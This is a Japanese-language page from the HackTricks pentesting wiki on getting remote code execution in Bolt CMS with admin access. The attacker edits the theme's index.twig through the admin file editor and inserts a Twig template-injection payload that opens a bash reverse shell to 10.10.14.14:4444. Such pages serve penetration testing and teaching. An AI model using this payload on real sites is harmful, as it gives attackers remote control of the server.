Japanese - Ht

HackTricks Afrikaans - Ht Chinese - Ht Español - Ht Français - Ht German - Ht Greek - Ht Hindi - Ht Italian - Ht Japanese - Ht Korean - Ht Polish - Ht Português - Ht Serbian - Ht Swahili - Ht Turkish - Ht Ukranian - Ht

👾Welcome!
🤩Generic Methodologies & Resources
🐧Linux Hardening
🍏MacOS Hardening
🪟Windows Hardening
📱Mobile Pentesting
👽Network Services Pentesting
🕸️Pentesting Web
⛈️Cloud Security
😎Hardware/Physical Access
🎯Binary Exploitation
🔩Reversing
🔮Crypto & Stego
🦂C2
✍️TODO

Powered by GitBook

On this page

Bolt CMS

PreviousArtifactory Hacking guide NextBuckets

Last updated 4 months ago

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

RCE

管理者としてログインした後（/botに移動してログインプロンプトにアクセス）、Bolt CMSでRCEを取得できます：

Configuration -> View Configuration -> Main Configurationを選択するか、URLパス/bolt/file-edit/config?file=/bolt/config.yamlに移動します。
テーマの値を確認します。

File management -> View & edit templatesを選択します。
前のステップで見つけたテーマベース（この場合はbase-2021）を選択し、index.twigを選択します。
私の場合、これはURLパス/bolt/file-edit/themes?file=/base-2021/index.twigにあります。
template injection (Twig)を介してこのファイルにペイロードを設定します。例：{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
変更を保存します。

Maintenance -> Clear the cacheでキャッシュをクリアします。
再度通常のユーザーとしてページにアクセスすると、ペイロードが実行されるはずです。

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)